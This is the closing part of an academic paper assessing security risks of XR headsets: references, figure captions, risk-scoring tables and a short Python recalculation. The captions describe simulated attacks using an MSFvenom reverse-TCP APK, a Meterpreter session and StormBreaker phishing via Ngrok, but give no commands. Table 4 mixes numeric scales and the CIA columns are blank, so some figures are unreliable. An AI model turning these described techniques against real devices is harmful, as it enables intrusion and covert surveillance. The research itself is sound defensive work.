  37. Vondráček, M.; Baggili, I.; Casey, P.; Mekni, M. Rise of the Metaverse’s Immersive Virtual Reality Malware and the Man-in-the-Room Attack & Defenses. Comput. Secur. 2023, 127, 102923. [Google Scholar] [CrossRef]
  38. El-Hajj, M. Cybersecurity and Privacy Challenges in Extended Reality: Threats, Solutions, and Risk Mitigation Strategies. Virtual Worlds 2024, 4, 1. [Google Scholar] [CrossRef]
  39. Cayir, D.; Acar, A.; Lazzeretti, R.; Angelini, M.; Conti, M.; Uluagac, S. Augmenting Security and Privacy in the Virtual Realm: An Analysis of Extended Reality Devices. IEEE Secur. Priv. 2024, 22, 10–23. [Google Scholar] [CrossRef]
  40. Khan, S.; Parkinson, S. Review into State of the Art of Vulnerability Assessment Using Artificial Intelligence; Springer: Berlin/Heidelberg, Germany, 2018; pp. 3–32. [Google Scholar] [CrossRef]
  41. Arafat, M.; Hadi, M.; Raihan, M.A.; Iqbal, M.S.; Tariq, M.T. Benefits of connected vehicle signalized left-turn assist: Simulation-based study. Transp. Eng. 2021, 4, 100065. [Google Scholar] [CrossRef]
  42. Lutz, R.R. Safe-AR: Reducing Risk While Augmenting Reality. In Proceedings of the 2018 IEEE 29th International Symposium on Software Reliability Engineering (ISSRE), Memphis, TN, USA, 15–18 October 2018; IEEE: Piscataway, NJ, USA, 2018; pp. 70–75. [Google Scholar] [CrossRef]
  43. Academic: Attack Trees—Schneier on Security, Schneier on Security. Available online: https://www.schneier.com/academic/archives/1999/12/attack_trees.html (accessed on 13 March 2023).
  44. Ip, H.H.S.; Li, C. Virtual Reality-Based Learning Environments: Recent Developments and Ongoing Challenges. In Hybrid Learning: Innovation in Educational Practices; Cheung, S.K.S., Kwok, L., Yang, H., Fong, J., Kwan, R., Eds.; Lecture Notes in Computer Science; Springer International Publishing: Cham, Switzerland, 2015; Volume 9167, pp. 3–14. [Google Scholar] [CrossRef]
  45. Metasploit Unleashed|MSFvenom|OffSec. Available online: https://www.offsec.com/metasploit-unleashed/msfvenom/ (accessed on 17 April 2024).
  46. Raj, S.; Walia, N.K. A Study on Metasploit Framework: A Pen-Testing Tool. In Proceedings of the 2020 International Conference on Computational Performance Evaluation (ComPE), Shillong, India, 2–4 July 2020; pp. 296–302. [Google Scholar] [CrossRef]
  47. Blancaflor, E.; Billo, H.K.S.; Saunar, B.Y.P.; Dignadice, J.M.P.; Domondon, P.T. Penetration assessment and ways to combat attack on Android devices through StormBreaker—A social engineering tool. In Proceedings of the 2023 6th International Conference on Information and Computer Technologies (ICICT), Raleigh, NC, USA, 24–26 March 2023; pp. 220–225. [Google Scholar] [CrossRef]
  48. Manoj, M.; Sajeev, R.; Biju, S.; Joseph, S. A Collaborative Approach for Android Hacking by Integrating Evil-Droid, Ngrok, Armitage and its Countermeasures. In Proceedings of the National Conference on Emerging Computer Applications (NCECA2020), Kottayam, India, 14 August 2020. [Google Scholar] [CrossRef]
  49. Arunanshu, G.S.; Srinivasan, K. Evaluating the Efficacy of Antivirus Software Against Malware and Rats Using Metasploit and Asyncrat. In Proceedings of the 2023 Innovations in Power and Advanced Computing Technologies (i-PACT), Kuala Lumpur, Malaysia, 8–10 December 2023; pp. 1–8. [Google Scholar] [CrossRef]
  50. Mohanty, S.; Ganguly, M.; Pattnaik, P.K. CIA Triad for Achieving Accountability in Cloud Computing Environment; Pulsus Healthtech Ltd.: Berkshire, UK, 2018. [Google Scholar]
  51. NVD—CVSS v3 Calculator. Available online: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator (accessed on 19 June 2023).
  52. National Institute of Standards and Technology. Joint Task Force Transformation Initiative Guide for Conducting Risk Assessments; National Institute of Standards and Technology: Gaithersburg, MD, USA, 2012; NIST SP 800-30r1. [Google Scholar] [CrossRef]
  53. An Enhanced Risk Formula for Software Security Vulnerabilities. Available online: https://www.isaca.org/resources/isaca-journal/past-issues/2014/an-enhanced-risk-formula-for-software-security-vulnerabilities (accessed on 22 March 2024).
  54. Csa Guide to Conducting Cybersecurity Risk Assessment for Critical Information Infrastructure 2021. Available online: https://isomer-user-content.by.gov.sg/36/016e3838-a9e5-4c6e-a037-546e8b7ad684/Guide-to-Conducting-Cybersecurity-Risk-Assessment-for-CII.pdf (accessed on 13 June 2023).
  55. Deng, M.; Zhai, H.; Yang, K. Social engineering in metaverse environment. In Proceedings of the 2023 IEEE 10th International Conference on Cyber Security and Cloud Computing (CSCloud)/2023 IEEE 9th International Conference on Edge Computing and Scalable Cloud (EdgeCom), Xiangtan, China, 1–3 July 2023; pp. 150–154. [Google Scholar] [CrossRef]
  56. Boubaker, S.; Karim, S.; Naeem, M.A.; Rahman, M.R. On the prediction of systemic risk tolerance of cryptocurrencies. Technol. Forecast. Soc. Chang. 2024, 198, 122963. [Google Scholar] [CrossRef]
  57. Allow Content from Unknown Sources for Your Meta Quest|Meta Store. Available online: https://www.meta.com/help/quest/articles/headsets-and-accessories/oculus-rift-s/unknown-sources/ (accessed on 31 August 2024).
  58. Chen, Y.; Yu, J.; Kong, L.; Kong, H.; Zhu, Y.; Chen, Y.-C. RF-Mic: Live Voice Eavesdropping via Capturing Subtle Facial Speech Dynamics Leveraging RFID. Proc. ACM Interact. Mob. Wearable Ubiquitous Technol. 2023, 7, 1–25. [Google Scholar] [CrossRef]
  59. Zallio, M.; John Clarkson, P. Metavethics: Ethical, integrity and social implications of the metaverse. In Proceedings of the Intelligent Human Systems Integration (IHSI 2023) Integrating People and Intelligent Systems, Rome, Italy, 27–29 March 2023. [Google Scholar] [CrossRef]
  60. McEvoy, R.; Kowalski, S. Cassandra’s Calling Card: Socio-technical Risk Analysis and Management in Cyber Security Systems. In Proceedings of the Security, Trust, and Privacy in Intelligent Systems, Gjøvik, Norway, 12–14 December 2019. [Google Scholar]
  61. Alqahtani, H.; Kavakli-Thorne, M.; Alrowaily, M. The Impact of Gamification Factor in the Acceptance of Cybersecurity Awareness Augmented Reality Game (CybAR). In HCI for Cybersecurity, Privacy and Trust; Moallem, A., Ed.; Lecture Notes in Computer Science; Springer International Publishing: Cham, Switzerland, 2020; Volume 12210, pp. 16–31. [Google Scholar]
  62. Alnajim, A.M.; Habib, S.; Islam, M.; AlRawashdeh, H.S.; Wasim, M. Exploring Cybersecurity Education and Training Techniques: A Comprehensive Review of Traditional, Virtual Reality, and Augmented Reality Approaches. Symmetry 2023, 15, 2175. [Google Scholar] [CrossRef]
  63. Dwivedi, Y.K.; Hughes, L.; Baabdullah, A.M.; Ribeiro-Navarrete, S.; Giannakis, M.; Al-Debei, M.M.; Dennehy, D.; Metri, B.; Buhalis, D.; Cheung, C.M.K.; et al. Metaverse beyond the hype: Multidisciplinary perspectives on emerging challenges, opportunities, and agenda for research, practice and policy. Int. J. Inf. Manag. 2022, 66, 102542. [Google Scholar] [CrossRef]
  64. Trend Micro Research. Metaverse or Metaworse? Cybersecurity Threats Against the Internet of Experiences; Trend Micro Research: Los Angeles, CA, USA, 2022; p. 24. [Google Scholar]
Figure 1. A workflow diagram of the remote code execution attack in scenario 1.
Figure 2. A workflow diagram of the eavesdropping and surveillance attack in scenario 2.
Figure 3. Proof of reverse TCP payload generation achieved by using MSFvenom to simulate Android APK-based exploitation in an XR environment.
Figure 4. Use of Metasploit’s multi-handler exploit module to establish a reverse TCP connection to the XR device. The terminal output confirmed there was a successful Meterpreter session and displayed system-level information retrieved via the sysinfo command.
Figure 5. Output of the Meterpreter app_list command, displaying applications installed on the XR device. The list includes system-level services such as com.oculus.appsafety and com.meta.AccountsCenter.pwa, which may be targeted for privilege escalation or to bypass user protections.
Figure 6. Storm Breaker’s server interface with open port 2525 forwarding traffic through Ngrok.
Figure 7. Ngrok-generated phishing URLs produced by Storm Breaker, targeting camera, microphone, and location sensors via deceptive XR-based interactions. These links simulate legitimate XR features to persuade users to grant sensitive permissions.
Figure 8. A disguised social feature that carries out real-time location tracking.
Figure 9. Successful delivery of location-tracking information via the Storm Breaker admin panel.
Figure 10. Recorded audio conversations sent to the listening server as a result of the microphone attack.
Figure 11. Admin panel displaying the image file received as a result of the camera attack.
Figure 12. Base score example: generating the vulnerability score and its associated impact score.
Figure 13. Risk scores of identified XR threats based on likelihood, vulnerability, and impact. Remote Code Execution (RCE), social engineering, and insecure app installation have the highest overall risk levels. Privacy threats such as eavesdropping, surveillance, and location tracking score lower but remain important due to their potential to compromise user confidentiality.
Figure 14. Comparison of vulnerability severity and resulting impact across identified XR threats. Remote Code Execution and social engineering demonstrate the highest vulnerability scores, reflecting widely exploitable system weaknesses.
Figure 15. Comparative view of threat likelihood and impact across XR attack scenarios. While all threats show relatively high impact values, likelihood scores remain low due to reliance on user interaction and permission prompts.
Table 1. Distinction between threats common to smart devices and those unique to XR.

| Threat | Applies to IoT/Smart Devices | Unique in XR Environments |
|---|---|---|
| Microphone hijacking | Applicable | Applicable |
| Camera access | Applicable | Applicable, but this feature is used for environment mapping, hand tracking, etc., increasing sensitivity |
| Malware | Applicable | Applicable: malware can hijack virtual environments and control user perception |
| Spatial manipulation | Not applicable | Applicable, XR-only threat: this feature is used to modify boundary tracking or virtual navigation |
| Immersive deception | Not applicable | Applicable: attackers can create malicious visual overlays in a VR/AR scene |
| Physical–virtual boundary disruption | Not applicable | Applicable: attackers may influence real-world actions via altered virtual cues |
Table 2. Comparison of related studies on risk assessment in XR environments.

| Refs. | Method | Field of Focus | Key Contributions | Limitations |
|---|---|---|---|---|
| [21] | Survey | AR and VR devices and applications | Reconnaissance and vulnerability identification | Lack of a structured risk scoring model |
| [27] | Attack trees | VR for educational environments | Risk quantification based on attack frequency and duration | No practical simulation or quantitative vulnerability scoring system |
| [10] | Survey | General XR domain | Identification of device-specific cyberattacks in critical domains | Risk prioritization lacks vulnerability scoring and is based only on likelihood and impact |
| [42] | Risk analysis framework | Automotive-AR-specific domain | A general safety-focused risk analysis method for cyber–physical interaction | Focused on human interaction and safety, not cybersecurity |
| [9] | Static code analysis | Oculus-based VR applications | Development of a tool (VR-SP) for app security and privacy auditing | Lacked real-world threat modeling and user-behavior-based risk evaluation |
| This study | Penetration testing and structured risk assessment | XR environment devices | Scenario-driven real-world attack simulations, structured likelihood model development, and hybrid CVSS-based risk scoring | Generalizable to multiple XR domains; integrates technical and human factors in a comprehensive scoring framework |
Table 3. Conditions that are considered in order to assign values to likelihood factors.

| Factor | What It Measures | Low Value (1–4) | Medium Value (5–7) | High Value (8–10) |
|---|---|---|---|---|
| UBS | How likely users are to fall for the attack | Zero-click attack, requires no user interaction | Some social engineering required | Highly dependent on phishing/social engineering |
| VEE | How easy the exploit is | Zero-day, complex, no public tools | Requires user privileges; some public exploits exist | Public exploit; no privileges required; Metasploit tools exist |
| SEL | How exposed the vulnerable system is | Requires physical access, highly restricted | Requires internal network access, VPN needed | Public internet exposure, easy external access |
| APA | How often this exploit is used in attacks | No known attacks, private, zero-day | Some malware families use it | Actively exploited in real-world attacks; used by ransomware and APT groups |
Table 4. The probability of each issue occurring in an XR environment: ((3 × UBS) + (2 × VEE) + (2 × SEL) + (3 × APA))/100.

| Threats | UBS × 3 | VEE × 2 | SEL × 2 | APA × 3 | Weighted Likelihood |
|---|---|---|---|---|---|
| Insecure App Installation | 24 | 12 | 18 | 21 | 0.75 |
| Social Engineering | 30 | 8 | 14 | 27 | 0.79 |
| Remote Code Execution (RCE) | 18 | 18 | 16 | 27 | 0.79 |
| Unauthorized Access and Data Exfiltration | 21 | 10 | 18 | 24 | 0.73 |
| Eavesdropping | 2.4 | 1.2 | 1 | 2.4 | 0.70 |
| Surveillance | 1.8 | 1.2 | 1 | 2.4 | 0.64 |
| Location tracking | 1.8 | 1 | 1 | 2.4 | 0.62 |
Using the values for impact and likelihood, we can calculate the risk scores and proceed with the analysis of each threat.
Table 5. A computation of the risk scores.

| Threats | Likelihood | Vulnerability | Impact | Risk Score (L × V × I) |
|---|---|---|---|---|
| Insecure App Installation | 0.75 | 7.3 | 5.5 | 30 |
| Social Engineering | 0.79 | 8.8 | 5.3 | 37 |
| Remote Code Execution (RCE) | 0.79 | 8.8 | 5.9 | 41 |
| Unauthorized Access and Data Exfiltration | 0.73 | 8.2 | 4.2 | 25 |
| Eavesdropping | 0.70 | 6.5 | 3.6 | 16 |
| Surveillance | 0.64 | 6.5 | 3.6 | 15 |
| Location tracking | 0.62 | 6.5 | 3.6 | 15 |
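For reproducibility, the short sketch below recomputes the weighted likelihood from Table 4 and the composite risk score from Table 5 for the RCE threat. The underlying factor values are inferred by dividing the weighted table entries by their weights, and rounding the final score to an integer is an assumption about the original computation.

```python
def weighted_likelihood(ubs: float, vee: float, sel: float, apa: float) -> float:
    """Likelihood = ((3*UBS) + (2*VEE) + (2*SEL) + (3*APA)) / 100, as in Table 4."""
    return (3 * ubs + 2 * vee + 2 * sel + 3 * apa) / 100

def risk_score(likelihood: float, vulnerability: float, impact: float) -> int:
    """Composite risk = Likelihood x Vulnerability x Impact (Table 5), rounded to an integer."""
    return round(likelihood * vulnerability * impact)

if __name__ == "__main__":
    # Remote Code Execution: these raw factor values reproduce the weighted entries
    # 18 (UBS x 3), 18 (VEE x 2), 16 (SEL x 2), and 27 (APA x 3) from Table 4.
    rce_likelihood = weighted_likelihood(ubs=6, vee=9, sel=8, apa=9)
    print(rce_likelihood)                        # 0.79
    print(risk_score(rce_likelihood, 8.8, 5.9))  # 41, matching Table 5
```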
Table 6. Final computed risk scores detailing the impact on the CIA triad and the severity of the impacts.

| Threats | C | I | A | Likelihood | Vulnerability | Impact | Risk Score | Severity |
|---|---|---|---|---|---|---|---|---|
| Insecure App Installation |  |  |  | 0.75 | 7.3 | 5.5 | 30 | High |
| Social Engineering |  |  |  | 0.79 | 8.8 | 5.3 | 37 | High |
| Remote Code Execution (RCE) |  |  |  | 0.79 | 8.8 | 5.9 | 41 | High |
| Unauthorized Access and Data Exfiltration |  |  |  | 0.73 | 8.2 | 4.2 | 25 | Medium |
| Eavesdropping |  |  |  | 0.70 | 6.5 | 3.6 | 16 | Low |
| Surveillance |  |  |  | 0.64 | 6.5 | 3.6 | 15 | Low |
| Location tracking |  |  |  | 0.62 | 6.5 | 3.6 | 15 | Low |

√ indicates that the threat impacts the corresponding CIA security property.